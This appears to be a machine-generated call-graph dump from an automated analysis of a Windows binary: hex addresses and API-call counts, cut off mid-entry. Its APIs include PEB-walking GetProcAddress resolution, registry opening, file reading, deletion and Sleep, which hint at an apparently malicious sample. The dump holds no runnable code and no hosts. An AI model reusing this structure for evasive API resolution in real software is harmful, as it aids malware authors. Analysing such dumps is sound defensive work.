8877 4070ff 8735->8877 8899 405907 8736->8899 8738 405a61 8739 405a76 8738->8739 8740 405907 4 API calls 8738->8740 8739->8555 8740->8738 8742 402b7c 2 API calls 8741->8742 8745 405a99 8742->8745 8743 405ade 8743->8573 8745->8743 8902 40595e 8745->8902 8774 4076a8 8746->8774 8748 406913 8749 406a61 8748->8749 8750 40771e 6 API calls 8748->8750 8749->8689 8754 406949 8750->8754 8751 40771e 6 API calls 8751->8754 8753 404678 4 API calls 8753->8754 8754->8749 8754->8751 8754->8753 8780 4046c2 8754->8780 8756 4031e5 4 API calls 8755->8756 8757 4068a6 8756->8757 8757->8689 8759 4046b4 8758->8759 8760 4046a4 8758->8760 8759->8687 8762 404678 8759->8762 8761 4031e5 4 API calls 8760->8761 8761->8759 8763 4031e5 4 API calls 8762->8763 8764 40468b 8763->8764 8764->8687 8765 40771e 8764->8765 8766 407737 8765->8766 8770 407748 8765->8770 8767 407644 6 API calls 8766->8767 8768 407741 8767->8768 8769 406baa 6 API calls 8768->8769 8769->8770 8770->8698 8772 4031e5 4 API calls 8771->8772 8773 4068c2 8772->8773 8773->8705 8775 4076c1 8774->8775 8779 4076d2 8774->8779 8788 407644 8775->8788 8779->8748 8781 4046d3 8780->8781 8782 4046d9 8780->8782 8823 40464c 8781->8823 8784 4046e9 8782->8784 8786 404678 4 API calls 8782->8786 8785 404714 8784->8785 8787 40469b 4 API calls 8784->8787 8785->8754 8786->8784 8787->8785 8789 407653 8788->8789 8790 407661 8788->8790 8789->8790 8796 406a6b 8789->8796 8792 406baa 8790->8792 8793 406bbb 8792->8793 8795 406bc8 8792->8795 8793->8795 8804 407402 8793->8804 8795->8779 8800 406a81 8796->8800 8797 402b7c 2 API calls 8797->8800 8798 406b8b 8798->8790 8799 406894 4 API calls 8799->8800 8800->8797 8800->8798 8800->8799 8801 406b96 8800->8801 8802 402bab 2 API calls 8800->8802 8803 402bab 2 API calls 8801->8803 8802->8800 8803->8798 8805 407644 6 API calls 8804->8805 8806 407412 8805->8806 8807 402b7c 2 API calls 8806->8807 8814 407450 8806->8814 8808 407483 8807->8808 8809 402b7c 2 API calls 8808->8809 8808->8814 8812 4074ce 8809->8812 8810 4074da 8811 4068cc 2 API calls 8810->8811 8811->8814 8812->8810 8813 402b7c 2 API calls 8812->8813 8817 40751f 8813->8817 8814->8795 8815 40752b 8816 4068cc 2 API calls 8815->8816 8816->8810 8817->8815 8819 4068cc 8817->8819 8820 4068d6 8819->8820 8821 4068e3 8819->8821 8820->8821 8822 402bab GetProcessHeap HeapFree 8820->8822 8821->8815 8822->8821 8824 404666 8823->8824 8825 404659 8823->8825 8824->8782 8826 4031e5 4 API calls 8825->8826 8826->8824 8828 4047e6 5 API calls 8827->8828 8829 404897 8828->8829 8830 40489c 8829->8830 8885 4047c7 8829->8885 8830->8708 8834 40706f 8833->8834 8835 407084 8833->8835 8834->8835 8836 407644 6 API calls 8834->8836 8840 4070e4 8835->8840 8888 406fd2 8835->8888 8837 40707d 8836->8837 8839 406baa 6 API calls 8837->8839 8839->8835 8840->8713 8841 40719a 8840->8841 8842 4071b0 8841->8842 8844 4071c5 8841->8844 8843 407644 6 API calls 8842->8843 8842->8844 8845 4071be 8843->8845 8847 406fd2 4 API calls 8844->8847 8848 407226 8844->8848 8846 406baa 6 API calls 8845->8846 8846->8844 8847->8848 8848->8717 8848->8719 8850 406f64 8849->8850 8853 406f75 8849->8853 8851 407644 6 API calls 8850->8851 8852 406f6e 8851->8852 8854 406baa 6 API calls 8852->8854 8853->8725 8854->8853 8896 4060ac 8855->8896 8878 407116 8877->8878 8879 40712b 8877->8879 8878->8879 8880 407644 6 API calls 8878->8880 8883 407187 8879->8883 8884 406fd2 4 API calls 8879->8884 8881 407124 8880->8881 8882 406baa 6 API calls 8881->8882 8882->8879 8883->8717 8884->8883 8886 4031e5 4 API calls 8885->8886 8887 4047d9 8886->8887 8887->8708 8889 406fde 8888->8889 8890 407027 8889->8890 8891 4031e5 4 API calls 8889->8891 8890->8840 8892 406ffa 8891->8892 8893 4031e5 4 API calls 8892->8893 8894 407011 8893->8894 8895 4031e5 4 API calls 8894->8895 8895->8890 8897 4031e5 4 API calls 8896->8897 8898 4060bb 8897->8898 8898->8898 8900 4031e5 4 API calls 8899->8900 8901 40591a 8900->8901 8901->8738 8903 4031e5 4 API calls 8902->8903 8904 405971 8903->8904 8904->8745 8906 4031e5 4 API calls 8905->8906 8907 4059ed 8906->8907 8908 402b7c 2 API calls 8907->8908 8911 405a38 8907->8911 8909 405a16 8908->8909 8910 4031e5 4 API calls 8909->8910 8909->8911 8910->8911 8911->8652 8913 4031e5 4 API calls 8912->8913 8914 4044b9 8913->8914 8914->8513 9834 40a349 9835 4098a7 13 API calls 9834->9835 9836 40a359 9835->9836 9073 408952 9094 40823f 9073->9094 9076 408960 9078 4056bf 2 API calls 9076->9078 9079 40896a 9078->9079 9122 408862 9079->9122 9081 413aca 4 API calls 9082 4089d4 9081->9082 9084 405695 2 API calls 9082->9084 9083 408975 9091 4089c4 9083->9091 9130 4087d6 9083->9130 9086 4089df 9084->9086 9091->9081 9092 402bab 2 API calls 9093 40899d 9092->9093 9093->9091 9093->9092 9095 40824d 9094->9095 9096 40831b 9095->9096 9097 4031e5 4 API calls 9095->9097 9096->9076 9110 4083bb 9096->9110 9098 40826d 9097->9098 9099 4031e5 4 API calls 9098->9099 9100 408289 9099->9100 9101 4031e5 4 API calls 9100->9101 9102 4082a5 9101->9102 9103 4031e5 4 API calls 9102->9103 9104 4082c1 9103->9104 9105 4031e5 4 API calls 9104->9105 9106 4082e2 9105->9106 9107 4031e5 4 API calls 9106->9107 9108 4082ff 9107->9108 9109 4031e5 4 API calls 9108->9109 9109->9096 9158 408363 9110->9158 9113 4084ab 9113->9076 9114 4056bf 2 API calls 9119 4083f4 9114->9119 9115 408492 9116 413aca 4 API calls 9115->9116 9117 4084a0 9116->9117 9118 405695 2 API calls 9117->9118 9118->9113 9119->9115 9161 40815d 9119->9161 9176 40805d 9119->9176 9191 404b8f 9122->9191 9124 408946 9124->9083 9125 40887e 9125->9124 9126 4031e5 4 API calls 9125->9126 9127 40893e 9125->9127 9129 402b7c 2 API calls 9125->9129 9126->9125 9194 404a39 9127->9194 9129->9125 9131 402b7c 2 API calls 9130->9131 9132 4087e7 9131->9132 9133 40885a 9132->9133 9134 4031e5 4 API calls 9132->9134 9142 408749 9133->9142 9135 408802 9134->9135 9138 40884d 9135->9138 9141 408853 9135->9141 9203 408522 9135->9203 9207 4084b4 9135->9207 9136 402bab 2 API calls 9136->9133 9210 4084d4 9138->9210 9141->9136 9143 404b8f 5 API calls 9142->9143 9145 408765 9143->9145 9144 4031e5 4 API calls 9144->9145 9145->9144 9146 408522 4 API calls 9145->9146 9147 4087c7 9145->9147 9149 4087cf 9145->9149 9146->9145 9148 404a39 5 API calls 9147->9148 9148->9149 9150 4085d1 9149->9150 9151 4086c2 9150->9151 9154 4085e9 9150->9154 9151->9093 9153 402bab 2 API calls 9153->9154 9154->9151 9154->9153 9155 4031e5 4 API calls 9154->9155 9216 4089e6 9154->9216 9235 4086c9 9154->9235 9239 4036a3 9154->9239 9155->9154 9159 4031e5 4 API calls 9158->9159 9160 408386 9159->9160 9160->9113 9160->9114 9162 40816f 9161->9162 9163 4081b6 9162->9163 9164 4081fd 9162->9164 9175 4081ef 9162->9175 9165 405872 4 API calls 9163->9165 9166 405872 4 API calls 9164->9166 9167 4081cf 9165->9167 9168 408213 9166->9168 9169 405872 4 API calls 9167->9169 9170 405872 4 API calls 9168->9170 9171 4081df 9169->9171 9172 408222 9170->9172 9173 405872 4 API calls 9171->9173 9174 405872 4 API calls 9172->9174 9173->9175 9174->9175 9175->9119 9177 40808c 9176->9177 9178 4080d2 9177->9178 9179 408119 9177->9179 9190 40810b 9177->9190 9181 405872 4 API calls 9178->9181 9180 405872 4 API calls 9179->9180 9182 40812f 9180->9182 9183 4080eb 9181->9183 9185 405872 4 API calls 9182->9185 9184 405872 4 API calls 9183->9184 9186 4080fb 9184->9186 9187 40813e 9185->9187 9188 405872 4 API calls 9186->9188 9189 405872 4 API calls 9187->9189 9188->9190 9189->9190 9190->9119 9197 404a19 9191->9197 9193 404ba0 9193->9125 9200 4049ff 9194->9200 9196 404a44 9196->9124 9198 4031e5 4 API calls 9197->9198 9199 404a2c RegOpenKeyW 9198->9199 9199->9193 9201 4031e5 4 API calls 9200->9201 9202 404a12 RegCloseKey 9201->9202 9202->9196 9205 408534 9203->9205 9204 4085af 9204->9135 9205->9204 9213 4084ee 9205->9213 9208 4031e5 4 API calls 9207->9208 9209 4084c7 9208->9209 9209->9135 9211 4031e5 4 API calls 9210->9211 9212 4084e7 9211->9212 9212->9141 9214 4031e5 4 API calls 9213->9214 9215 408501 9214->9215 9215->9204 9217 4031e5 4 API calls 9216->9217 9218 408a06 9217->9218 9219 4031e5 4 API calls 9218->9219 9223 408b21 9218->9223 9221 408a32 9219->9221 9220 408b17 9251 403649 9220->9251 9221->9220 9242 403666 9221->9242 9223->9154 9226 408b0e 9248 40362f 9226->9248 9227 4031e5 4 API calls 9229 408a88 9227->9229 9229->9226 9230 4031e5 4 API calls 9229->9230 9231 408ac4 9230->9231 9232 405b6f 6 API calls 9231->9232 9233 408aff 9232->9233 9233->9226 9245 408508 9233->9245 9236 408744 9235->9236 9237 4086e2 9235->9237 9236->9154 9237->9236 9238 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 9237->9238 9238->9237 9240 4031e5 4 API calls 9239->9240 9241 4036b5 9240->9241 9241->9154 9243 4031e5 4 API calls 9242->9243 9244 403679 9243->9244 9244->9226 9244->9227 9246 4031e5 4 API calls 9245->9246 9247 40851b 9246->9247 9247->9226 9249 4031e5 4 API calls 9248->9249 9250 403642 9249->9250 9250->9220 9252 4031e5 4 API calls 9251->9252 9253 40365c 9252->9253 9253->9223 9854 40f252 9855 404bee 6 API calls 9854->9855 9856 40f269 9855->9856 9857 404bee 6 API calls 9856->9857 9863 40f2ff 9856->9863 9858 40f282 9857->9858 9859 404bee 6 API calls 9858->9859 9860 40f290 9859->9860 9871 404c4e 9860->9871 9862 40f2a7 9862->9863 9864 405872 4 API calls 9862->9864 9865 40f2cd 9864->9865 9866 405872 4 API calls 9865->9866 9867 40f2dc 9866->9867 9868 405872 4 API calls 9867->9868 9869 40f2ee 9868->9869 9870 405762 4 API calls 9869->9870 9870->9863 9872 402b7c 2 API calls 9871->9872 9874 404c60 9872->9874 9873 404ca4 9873->9862 9874->9873 9875 4031e5 4 API calls 9874->9875 9876 404c8d 9875->9876 9876->9873 9877 402bab 2 API calls 9876->9877 9877->9873 9878 41045c 9879 4040bb 12 API calls 9878->9879 9880 410477 9879->9880 9881 41060b 9880->9881 9909 407851 9880->9909 9883 41048f 9885 407851 2 API calls 9883->9885 9889 410604 9883->9889 9884 403f9e 5 API calls 9884->9881 9886 4104a9 9885->9886 9891 4105e0 9886->9891 9892 405ae9 6 API calls 9886->9892 9894 41056f 9886->9894 9895 4105eb 9886->9895 9887 402bab 2 API calls 9887->9889 9888 402bab 2 API calls 9890 4105fb 9888->9890 9889->9884 9890->9887 9893 402bab 2 API calls 9891->9893 9891->9895 9892->9886 9893->9895 9894->9891 9896 4105d6 9894->9896 9898 412269 6 API calls 9894->9898 9895->9888 9895->9890 9897 402bab 2 API calls 9896->9897 9897->9891 9899 410580 9898->9899 9899->9896 9900 405872 4 API calls 9899->9900 9901 410599 9900->9901 9902 405872 4 API calls 9901->9902 9903 4105a9 9902->9903 9904 405872 4 API calls 9903->9904 9905 4105bb 9904->9905 9906 405872 4 API calls 9905->9906 9907 4105cd 9906->9907 9908 402bab 2 API calls 9907->9908 9908->9896 9910 407866 9909->9910 9911 402b7c 2 API calls 9910->9911 9912 407899 9910->9912 9911->9912 9912->9883 9315 40f561 9318 40f4b6 9315->9318 9319 413b28 6 API calls 9318->9319 9324 40f4bf 9319->9324 9320 40f559 9321 405b6f 6 API calls 9321->9324 9322 402bab GetProcessHeap HeapFree 9322->9324 9323 413a58 13 API calls 9323->9324 9324->9320 9324->9321 9324->9322 9324->9323 9328 403b64 9329 4031e5 4 API calls 9328->9329 9330 403b77 PathFileExistsW 9329->9330 9944 40d069 9945 404bee 6 API calls 9944->9945 9946 40d080 9945->9946 9947 404bee 6 API calls 9946->9947 9968 40d1e2 9946->9968 9948 40d099 9947->9948 9949 404bee 6 API calls 9948->9949 9950 40d0a7 9949->9950 9985 404ba7 9950->9985 9953 404bee 6 API calls 9954 40d0c5 9953->9954 9955 404c4e 6 API calls 9954->9955 9956 40d0dc 9955->9956 9957 404bee 6 API calls 9956->9957 9958 40d0eb 9957->9958 9959 404ba7 4 API calls 9958->9959 9960 40d0fa 9959->9960 9961 404bee 6 API calls 9960->9961 9962 40d109 9961->9962 9963 404c4e 6 API calls 9962->9963 9964 40d123 9963->9964 9965 405872 4 API calls 9964->9965 9964->9968 9966 40d14a 9965->9966 9967 405872 4 API calls 9966->9967 9969 40d159 9967->9969 9970 405872 4 API calls 9969->9970 9971 40d16b 9970->9971 9972 405781 4 API calls 9971->9972 9973 40d179 9972->9973 9974 405872 4 API calls 9973->9974 9975 40d18b 9974->9975 9976 405762 4 API calls 9975->9976 9977 40d19f 9976->9977 9978 405872 4 API calls 9977->9978 9979 40d1b1 9978->9979 9980 405781 4 API calls 9979->9980 9981 40d1bf 9980->9981 9982 405872 4 API calls 9981->9982 9983 40d1d1 9982->9983 9984 405762 4 API calls 9983->9984 9984->9968 9986 4031e5 4 API calls 9985->9986 9987 404bca 9986->9987 9987->9953 9357 40f16e 9358 4056bf 2 API calls 9357->9358 9359 40f17b 9358->9359 9360 412093 20 API calls 9359->9360 9361 40f19e 9360->9361 9362 412093 20 API calls 9361->9362 9363 40f1b6 9362->9363 9364 412093 20 API calls 9363->9364 9365 40f1cc 9364->9365 9366 412093 20 API calls 9365->9366 9367 40f1e2 9366->9367 9368 413aca 4 API calls 9367->9368 9369 40f1ef 9368->9369 9370 405695 2 API calls 9369->9370 9371 40f1fa 9370->9371 9372 40ce71 9373 413b28 6 API calls 9372->9373 9374 40ce78 9373->9374 9375 405b6f 6 API calls 9374->9375 9378 40ce83 9375->9378 9376 40cec1 9377 403fbf 7 API calls 9376->9377 9379 40cecc 9377->9379 9378->9376 9380 403d74 19 API calls 9378->9380 9390 40ceba 9378->9390 9382 403d74 19 API calls 9379->9382 9389 40cefb 9379->9389 9384 40cead 9380->9384 9381 402bab 2 API calls 9381->9376 9383 40cee7 9382->9383 9385 402bab 2 API calls 9383->9385 9388 40cef4 9383->9388 9387 402bab 2 API calls 9384->9387 9384->9390 9385->9388 9386 402bab 2 API calls 9386->9389 9387->9390 9388->9386 9390->9381 9391 406472 9392 4031e5 4 API calls 9391->9392 9393 406484 Sleep 9392->9393 10061 40f204 10062 405781 4 API calls 10061->10062 10063 40f214 10062->10063 10064 4057df 13 API calls 10063->10064 10065 40f226 10064->10065 9451 403c08 9452 4031e5 4 API calls 9451->9452 9453 403c1a DeleteFileW 9452->9453 9454 410a09 9455 41219c 14 API calls 9454->9455 9456 410a1b 9455->9456 9457 41219c 14 API calls 9456->9457 9458 410a23 9457->9458 9459 41219c 14 API calls 9458->9459 9460 410a2c 9459->9460 9461 41219c 14 API calls 9460->9461 9462 410a38 9461->9462 9463 404b22 6 API calls 9462->9463 9464 410a4c 9463->9464 9465 410a7a 9464->9465 9466 403fbf 7 API calls 9464->9466 9467 410a5c 9466->9467 9468 410a71 9467->9468 9469 413a58 13 API calls 9467->9469 9470 402bab 2 API calls 9468->9470 9471 410a6b 9469->9471 9470->9465 9472 402bab 2 API calls 9471->9472 9472->9468 10066 410d09 10067 410d17 10066->10067 10081 410d56 10066->10081 10082 406642 10067->10082 10068 413a58 13 API calls 10071 410d6f 10068->10071 10072 4056bf 2 API calls 10073 410d2e 10072->10073 10095 405641 10073->10095 10075 410d41 10076 413aca 4 API calls 10075->10076 10077 410d4a 10076->10077 10078 405695 2 API calls 10077->10078 10079 410d50 10078->10079 10080 4036a3 4 API calls 10079->10080 10080->10081 10081->10068 10083 406662 10082->10083 10084 4031e5 4 API calls 10083->10084 10085 406676 10084->10085 10099 4066bf 10085->10099 10090 4066b1 10092 4036a3 4 API calls 10090->10092 10091 4066a7 10093 4036a3 4 API calls 10091->10093 10094 4066ac 10092->10094 10093->10094 10094->10072 10094->10081 10096 40564d 10095->10096 10097 405673 10095->10097 10096->10097 10098 4056fc 4 API calls 10096->10098 10097->10075 10098->10097 10100 4031e5 4 API calls 10099->10100 10101 4066dc 10100->10101 10102 4066f6 SetLastError 10101->10102 10103 406708 GetLastError 10101->10103 10104 406693 10102->10104 10103->10104 10105 406713 10103->10105 10121 406455 10104->10121 10106 4031e5 4 API calls 10105->10106 10107 406725 10106->10107 10107->10104 10108 4031e5 4 API calls 10107->10108 10109 40673f 10108->10109 10110 406753 10109->10110 10111 406749 10109->10111 10112 4031e5 4 API calls 10110->10112 10113 4036a3 4 API calls 10111->10113 10114 406761 10112->10114 10113->10104 10115 40678a 10114->10115 10116 40677c 10114->10116 10118 4036a3 4 API calls 10115->10118 10117 4036a3 4 API calls 10116->10117 10119 406781 10117->10119 10118->10104 10120 4036a3 4 API calls 10119->10120 10120->10104 10122 4031e5 4 API calls 10121->10122 10123 406468 10122->10123 10123->10090 10123->10091 9473 40c509 9474 412093 20 API calls 9473->9474 9475 40c51e 9474->9475 9482 40910d 9483 404b22 6 API calls 9482->9483 9484 409124 9483->9484 9485 405b6f 6 API calls 9484->9485 9490 40917a 9484->9490 9486 40913e 9485->9486 9487 404b22 6 API calls 9486->9487 9495 409173 9486->9495 9489 409153 9487->9489 9488 402bab 2 API calls 9488->9490 9491 40916a 9489->9491 9492 409408 15 API calls 9489->9492 9493 402bab 2 API calls 9491->9493 9494 409164 9492->9494 9493->9495 9496 402bab 2 API calls 9494->9496 9495->9488 9496->9491 9500 410410 9501 4056bf 2 API calls 9500->9501 9502 41041b 9501->9502 9503 412093 20 API calls 9502->9503 9504 41043c 9503->9504 9505 413aca 4 API calls 9504->9505 9506 410449 9505->9506 9507 405695 2 API calls 9506->9507 9508 410454 9507->9508 9535 40c71a 9536 41219c 14 API calls 9535->9536 9537 40c728 9536->9537 10179 410b1a 10180 404bee 6 API calls 10179->10180 10182 410b31 10180->10182 10181 410c6d 10182->10181 10183 404bee 6 API calls 10182->10183 10184 410b5a 10183->10184 10185 404bee 6 API calls 10184->10185 10186 410b69 10185->10186 10187 404bee 6 API calls 10186->10187 10188 410b78 10187->10188 10189 404ba7 4 API calls 10188->10189 10190 410b86 10189->10190 10191 404ba7 4 API calls 10190->10191 10192 410b95 10191->10192 10192->10181 10193 405872 4 API calls 10192->10193 10194 410bd7 10193->10194 10195 405872 4 API calls 10194->10195 10196 410be8 10195->10196 10197 405872 4 API calls 10196->10197 10198 410bf9 10197->10198 10199 405781 4 API calls 10198->10199 10200 410c07 10199->10200 10201 405781 4 API calls 10200->10201 10205 410c15 10201->10205 10202 410c4e 10203 405762 4 API calls 10202->10203 10204 410c60 10203->10204 10204->10181 10207 403f9e 5 API calls 10204->10207 10205->10202 10212 405e5a 10205->10212 10207->10181 10209 4040bb 12 API calls 10210 410c44 10209->10210 10211 402bab 2 API calls 10210->10211 10211->10202 10213 402b7c 2 API calls 10212->10213 10214 405e72 10213->10214 10215 4031e5 4 API calls 10214->10215 10218 405ea3 10214->10218 10216 405e94 10215->10216 10217 402bab 2 API calls 10216->10217 10216->10218 10217->10218 10218->10202 10218->10209 10219 40f81c 10220 404bee 6 API calls 10219->10220 10221 40f833 10220->10221 10222 404bee 6 API calls 10221->10222 10236 40f94f 10221->10236 10223 40f85c 10222->10223 10224 404bee 6 API calls 10223->10224 10225 40f86b 10224->10225 10226 404bee 6 API calls 10225->10226 10227 40f87a 10226->10227 10228 404bee 6 API calls 10227->10228 10229 40f888 10228->10229 10230 404ba7 4 API calls 10229->10230 10231 40f897 10230->10231 10232 405872 4 API calls 10231->10232 10231->10236 10233 40f8d8 10232->10233 10234 405872 4 API calls 10233->10234 10235 40f8ea 10234->10235 10237 405872 4 API calls 10235->10237 10238 40f8fa 10237->10238 10239 405872 4 API calls 10238->10239 10240 40f90c 10239->10240 10241 405781 4 API calls 10240->10241 10242 40f91d 10241->10242 10243 4040bb 12 API calls 10242->10243 10244 40f92d 10243->10244 10245 405762 4 API calls 10244->10245 10246 40f93f 10245->10246 10246->10236 10247 403f9e 5 API calls 10246->10247 10247->10236 9550 402c1f 9551 4031e5 4 API calls 9550->9551 9552 402c31 LoadLibraryW 9551->9552 10257 407e1f 10258 407e2c 10257->10258 10265 407e61 10257->10265 10260 407e3e 10258->10260 10263 402bab 2 API calls 10258->10263 10266 407e51 10258->10266 10259 407ea6 10261 407eb6 10259->10261 10264 402bab 2 API calls 10259->10264 10262 407ed4 10260->10262 10267 402bab 2 API calls 10260->10267 10261->10266 10268 402bab 2 API calls 10261->10268 10263->10260 10264->10261 10265->10259 10265->10261 10269 405872 4 API calls 10265->10269 10266->10262 10270 402bab 2 API calls 10266->10270 10267->10266 10268->10266 10271 407e86 10269->10271 10270->10262 10272 405872 4 API calls 10271->10272 10273 407e96 10272->10273 10274 405872 4 API calls 10273->10274 10274->10259 9565 405924 9566 4031e5 4 API calls 9565->9566 9567 405937 StrStrW 9566->9567 10283 410927 10284 4044ee 7 API calls 10283->10284 10285 41093d 10284->10285 10286 4056bf 2 API calls 10285->10286 10297 4109a4 10285->10297 10289 410954 10286->10289 10287 4044ee 7 API calls 10287->10289 10289->10287 10290 402bab 2 API calls 10289->10290 10291 410990 10289->10291 10298 41080e 10289->10298 10290->10289 10292 413aca 4 API calls 10291->10292 10293 410998 10292->10293 10294 405695 2 API calls 10293->10294 10295 41099e 10294->10295 10296 402bab 2 API calls 10295->10296 10296->10297 10299 410821 10298->10299 10309 41091f 10299->10309 10310 410701 10299->10310 10302 405872 4 API calls 10303 410900 10302->10303 10304 405872 4 API calls 10303->10304 10305 41090d 10304->10305 10306 405872 4 API calls 10305->10306 10307 410919 10306->10307 10308 402bab 2 API calls 10307->10308 10308->10309 10309->10289 10311 405f08 4 API calls 10310->10311 10313 410713 10311->10313 10312 410804 10312->10302 10312->10309 10313->10312 10314 402b7c 2 API calls 10313->10314 10318 410748 10314->10318 10315 4107fd 10316 402bab 2 API calls 10315->10316 10316->10312 10317 402b7c 2 API calls 10320 4107ad 10317->10320 10318->10315 10318->10317 10319 402bab 2 API calls 10319->10315 10320->10319 10321 40d726 10322 404bee 6 API calls 10321->10322 10323 40d73f 10322->10323 10324 40db63 10323->10324 10325 405872 4 API calls 10323->10325 10328 40d761 10325->10328 10326 404bee 6 API calls 10326->10328 10327 405872 4 API calls 10327->10328 10328->10326 10328->10327 10329 40d971 10328->10329 10330 404ba7 4 API calls 10329->10330 10331 405781 4 API calls 10329->10331 10336 40d9bb 10329->10336 10330->10329 10331->10329 10332 404c4e 6 API calls 10332->10336 10333 405781 4 API calls 10333->10336 10334 4037be 4 API calls 10334->10336 10335 405872 4 API calls 10335->10336 10336->10324 10336->10332 10336->10333 10336->10334 10336->10335 9623 40f12f 9624 41219c 14 API calls 9623->9624 9625 40f13f 9624->9625 9626 41219c 14 API calls 9625->9626 9627 40f14c 9626->9627 9628 41219c 14 API calls 9627->9628 9629 40f159 9628->9629 9630 41219c 14 API calls 9629->9630 9631 40f166 9630->9631 9638 40ed35 9639 4056bf 2 API calls 9638->9639 9640 40ed42 9639->9640 9641 412093 20 API calls 9640->9641 9642 40ed63 9641->9642 9643 412093 20 API calls 9642->9643 9644 40ed73 9643->9644 9645 413aca 4 API calls 9644->9645 9646 40ed80 9645->9646 9647 405695 2 API calls 9646->9647 9648 40ed8e 9647->9648 8092 40f3c5 8097 41219c 8092->8097 8095 41219c 14 API calls 8096 40f3e1 8095->8096 8098 4121b1 8097->8098 8105 40f3d3 8097->8105 8099 4121be 8098->8099 8103 4121c5 8098->8103 8145 413ba4 8099->8145 8100 4121ca 8115 404056 8100->8115 8103->8100 8108 412210 8103->8108 8104 4121c3 8104->8105 8122 405b6f 8104->8122 8105->8095 8108->8105 8150 403fbf 8108->8150 8110 402bab 2 API calls 8110->8105 8114 41224d 8114->8105 8114->8110 8161 402b7c GetProcessHeap RtlAllocateHeap 8115->8161 8117 404066 8119 404095 8117->8119 8163 4031e5 8117->8163 8119->8104 8121 402bab 2 API calls 8121->8119 8123 405b7d 8122->8123 8124 402b7c 2 API calls 8123->8124 8125 405b99 8124->8125 8131 405c02 8125->8131 8199 4059b8 8125->8199 8127 405c09 8129 402bab 2 API calls 8127->8129 8128 405bba 8128->8127 8130 402b7c 2 API calls 8128->8130 8129->8131 8132 405bdd 8130->8132 8131->8114 8135 413a58 8131->8135 8132->8127 8133 405be4 8132->8133 8134 402bab 2 API calls 8133->8134 8134->8131 8136 412245 8135->8136 8137 413a63 8135->8137 8158 402bab 8136->8158 8137->8136 8202 405781 8137->8202 8140 405781 4 API calls 8141 413aa0 8140->8141 8205 4057df 8141->8205 8144 405781 4 API calls 8144->8136 8146 413bad 8145->8146 8147 404056 6 API calls 8146->8147 8149 413bb8 8146->8149 8148 413bc5 8147->8148 8148->8104 8149->8104 8151 402b7c 2 API calls 8150->8151 8153 403fcf 8151->8153 8152 403ff4 8152->8104 8153->8152 8324 403b98 8153->8324 8156 403ff8 GetLastError 8157 402bab 2 API calls 8156->8157 8157->8152 8159 402bb4 GetProcessHeap HeapFree 8158->8159 8160 402bc6 8158->8160 8159->8160 8160->8114 8162 402b98 8161->8162 8162->8117 8164 4031f3 8163->8164 8165 403236 8163->8165 8164->8165 8167 403208 8164->8167 8174 4030a5 8165->8174 8180 403263 8167->8180 8169 4031e5 4 API calls 8171 403258 8169->8171 8170 40320d 8170->8171 8172 4030a5 4 API calls 8170->8172 8171->8119 8171->8121 8173 403224 8172->8173 8173->8169 8173->8171 8186 402ca4 8174->8186 8176 4030b0 8177 4030b5 8176->8177 8190 4030c4 8176->8190 8177->8173 8181 40326d 8180->8181 8182 402b7c 2 API calls 8181->8182 8185 4032b7 8181->8185 8183 40328c 8182->8183 8184 402b7c 2 API calls 8183->8184 8184->8185 8185->8170 8187 403079 8186->8187 8189 40307c 8187->8189 8194 40317b GetPEB 8187->8194 8189->8176 8192 4030eb 8190->8192 8193 4030c0 8192->8193 8196 402c03 8192->8196 8193->8173 8195 40319b 8194->8195 8195->8189 8197 4031e5 3 API calls 8196->8197 8198 402c15 GetProcAddress 8197->8198 8198->8193 8200 4031e5 4 API calls 8199->8200 8201 4059cb 8200->8201 8201->8128 8220 405797 8202->8220 8204 405792 8204->8140 8206 4057eb 8205->8206 8219 405832 8205->8219 8206->8219 8230 4040bb 8206->8230 8209 405839 8211 405853 8209->8211 8257 405627 8209->8257 8210 40582c 8254 403f9e 8210->8254 8268 405762 8211->8268 8218 403f9e 5 API calls 8218->8219 8219->8136 8219->8144 8221 4057a1 8220->8221 8222 4057bd 8220->8222 8221->8222 8224 4056fc 8221->8224 8222->8204 8225 405714 8224->8225 8226 402b7c 2 API calls 8225->8226 8227 405730 8226->8227 8228 402bab 2 API calls 8227->8228 8229 405752 8227->8229 8228->8229 8229->8222 8231 4031e5 4 API calls 8230->8231 8232 4040d5 CreateFileW 8231->8232 8233 4040f8 8232->8233 8234 40418d 8232->8234 8235 4031e5 4 API calls 8233->8235 8236 404183 8234->8236 8274 403c90 8234->8274 8242 404105 8235->8242 8236->8209 8236->8210 8236->8219 8240 40416d 8271 403c40 8240->8271 8242->8240 8246 4031e5 4 API calls 8242->8246 8244 4040bb 9 API calls 8250 4041c8 8244->8250 8245 402bab 2 API calls 8245->8236 8247 404131 VirtualAlloc 8246->8247 8247->8240 8248 404142 8247->8248 8249 4031e5 4 API calls 8248->8249 8251 40414f ReadFile 8249->8251 8250->8245 8251->8240 8252 404160 8251->8252 8253 4031e5 4 API calls 8252->8253 8253->8240 8255 4031e5 4 API calls 8254->8255 8256 403fb1 VirtualFree 8255->8256 8256->8219 8258 4031e5 4 API calls 8257->8258 8259 40563a 8258->8259 8260 405872 8259->8260 8262 405881 8260->8262 8261 4058bc 8263 405797 4 API calls 8261->8263 8265 4058af 8261->8265 8262->8261 8321 4058d4 8262->8321 8263->8265 8265->8211 8267 405781 4 API calls 8267->8261 8269 405781 4 API calls 8268->8269 8270 405770 8269->8270 8270->8218 8272 4031e5 4 API calls 8271->8272 8273 403c52 CloseHandle 8272->8273 8273->8236 8275 403ca3 8274->8275 8276 403caa 8274->8276 8301 405dc5 8275->8301 8278 404056 6 API calls 8276->8278 8281 403d3a 8276->8281 8279 403cbe 8278->8279 8280 403d2e 8279->8280 8282 403d17 8279->8282 8283 403ccf 8279->8283 8280->8281 8286 402bab 2 API calls 8280->8286 8281->8236 8297 403c59 8281->8297 8284 405b6f 6 API calls 8282->8284 8285 405b6f 6 API calls 8283->8285 8287 403d14 8284->8287 8288 403cdd 8285->8288 8286->8281 8290 402bab 2 API calls 8287->8290 8289 405b6f 6 API calls 8288->8289 8291 403cee 8289->8291 8290->8280 8291->8287 8306 403d4d 8291->8306 8294 403d0b 8296 402bab 2 API calls 8294->8296 8296->8287 8298 403c21 8297->8298 8299 4031e5 4 API calls 8298->8299 8300 403c33 8299->8300 8300->8244 8300->8250 8315 406799 8301->8315 8303 405dd5 8304 402b7c 2 API calls 8303->8304 8305 405dfe 8304->8305 8305->8276 8318 403bb7 8306->8318 8308 403cfe 8308->8294 8309 403c62 8308->8309 8310 403d4d 5 API calls 8309->8310 8311 403c6d 8310->8311 8312 403c72 8311->8312 8313 4031e5 4 API calls 8311->8313 8312->8294 8314 403c87 CreateDirectoryW 8313->8314 8314->8294 8316 4031e5 4 API calls 8315->8316 8317 